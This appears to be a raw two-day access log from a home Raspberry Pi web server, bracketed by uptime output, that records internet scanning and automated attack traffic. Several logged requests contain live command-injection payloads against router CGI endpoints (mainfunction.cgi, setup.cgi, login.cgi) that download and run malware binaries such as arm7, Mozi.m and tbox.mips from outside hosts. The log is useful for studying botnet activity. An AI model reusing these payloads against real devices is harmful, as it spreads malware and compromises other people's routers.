Sat Apr 11 06:25:06 MDT 2020
 06:25:06 up 46 days, 10:53,  1 user,  load average: 0.39, 0.27, 0.27
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 46days 55:45   2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE
187.188.40.11 - - [11/Apr/2020:12:37:59 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS HTTP/1.1" 400 0 "" ""
187.188.40.11 - - [11/Apr/2020:12:37:59 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
162.243.129.53 - - [11/Apr/2020:14:16:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 zgrab/0.x"
112.126.56.11 - - [11/Apr/2020:15:08:34 +0000] "GET /index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
112.126.56.11 - - [11/Apr/2020:15:08:34 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
185.59.66.233 - - [11/Apr/2020:15:39:46 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet"
185.59.66.233 - - [11/Apr/2020:15:39:46 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
80.82.78.104 - - [11/Apr/2020:15:52:57 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "Go-http-client/1.1"
36.90.143.34 - - [11/Apr/2020:16:31:53 +0000] "GET / HTTP/1.1" 400 0 "" ""
208.91.109.18 - - [11/Apr/2020:16:32:55 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
208.91.109.18 - - [11/Apr/2020:16:32:55 +0000] "HEAD /robots.txt HTTP/1.0" 200 0 "" ""
45.234.222.181 - - [11/Apr/2020:20:04:57 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
175.3.164.35 - - [11/Apr/2020:20:30:29 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 0 "" ""
200.107.218.34 - - [11/Apr/2020:20:57:32 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
103.118.118.137 - - [11/Apr/2020:21:43:28 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
35.205.86.202 - - [11/Apr/2020:21:45:20 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4"
46.101.171.183 - - [11/Apr/2020:22:35:49 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
46.101.171.183 - - [11/Apr/2020:22:35:52 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
192.241.239.71 - - [11/Apr/2020:22:43:46 +0000] "GET /portal/redlion HTTP/1.1" 404 0 "" "Mozilla/5.0 zgrab/0.x"
213.14.32.42 - - [12/Apr/2020:01:03:20 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet"
213.14.32.42 - - [12/Apr/2020:01:03:20 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
61.219.11.153 - - [12/Apr/2020:01:20:39 +0000] "UNKNOWN  UNKNOWN" 0 0 "" ""
167.99.40.21 - - [12/Apr/2020:02:09:43 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
167.99.40.21 - - [12/Apr/2020:02:09:47 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
186.214.177.176 - - [12/Apr/2020:03:22:51 +0000] "GET / HTTP/1.1" 400 0 "" ""
159.146.37.43 - - [12/Apr/2020:03:53:11 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
142.93.187.70 - - [12/Apr/2020:04:14:27 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
84.99.36.50 - - [12/Apr/2020:05:01:42 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://37.49.226.140/luoqxbocmkxnexy/tbox.mips%20-O%20->%20/tmp/leonn;chmod%20777%20/tmp/leonn;/tmp/leonn%20dlink.mips%27$ HTTP/1.1" 400 0 "" "tbox/2.0"
84.99.36.50 - - [12/Apr/2020:05:01:42 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
87.244.228.199 - - [12/Apr/2020:07:23:55 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
176.113.174.95 - - [12/Apr/2020:07:26:59 +0000] "GET / HTTP/1.1" 400 0 "" ""
221.153.26.117 - - [12/Apr/2020:07:41:27 +0000] "GET / HTTP/1.1" 400 0 "" ""
167.114.169.17 - - [12/Apr/2020:08:06:39 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
167.114.169.17 - - [12/Apr/2020:08:06:43 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
139.99.141.237 - - [12/Apr/2020:08:32:09 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
139.99.141.237 - - [12/Apr/2020:08:32:12 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
139.99.141.237 - - [12/Apr/2020:08:32:15 +0000] "GET / HTTP/1.0" 200 25000 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
195.22.237.98 - - [12/Apr/2020:09:13:34 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.202.2.226 - - [12/Apr/2020:09:33:17 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
183.215.80.147 - - [12/Apr/2020:09:35:48 +0000] "POST /boaform/admin/formPing HTTP/1.1" 400 0 "" "polaris botnet"
183.215.80.147 - - [12/Apr/2020:09:35:48 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
162.155.39.37 - - [12/Apr/2020:09:40:12 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 0 "" "XTC"
162.155.39.37 - - [12/Apr/2020:09:40:13 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
190.152.144.202 - - [12/Apr/2020:11:22:18 +0000] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 400 0 "" ""
190.152.144.202 - - [12/Apr/2020:11:22:18 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
109.28.7.155 - - [12/Apr/2020:11:30:12 +0000] "GET / HTTP/1.1" 400 0 "" ""
109.28.7.155 - - [12/Apr/2020:11:30:13 +0000] "GET / HTTP/1.1" 400 0 "" ""
103.75.167.6 - - [12/Apr/2020:12:01:48 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
35.205.86.202 - - [12/Apr/2020:12:02:43 +0000] "GET / HTTP/1.1" 200 25000 "" "python-requests/2.18.4"
96.80.89.253 - - [12/Apr/2020:12:05:35 +0000] "POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7 HTTP/1.1" 400 0 "" ""
96.80.89.253 - - [12/Apr/2020:12:05:35 +0000] "UNKNOWN  UNKNOWN" 400 0 "" ""
180.189.165.13 - - [12/Apr/2020:12:22:44 +0000] "GET / HTTP/1.1" 200 25000 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
Sun Apr 12 06:25:06 MDT 2020
 06:25:07 up 47 days, 10:53,  1 user,  load average: 0.30, 0.23, 0.24
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
pi       tty7     :0               24Feb20 47days  1:07m  2.04s /usr/bin/lxsession -s LXDE-pi -e LXDE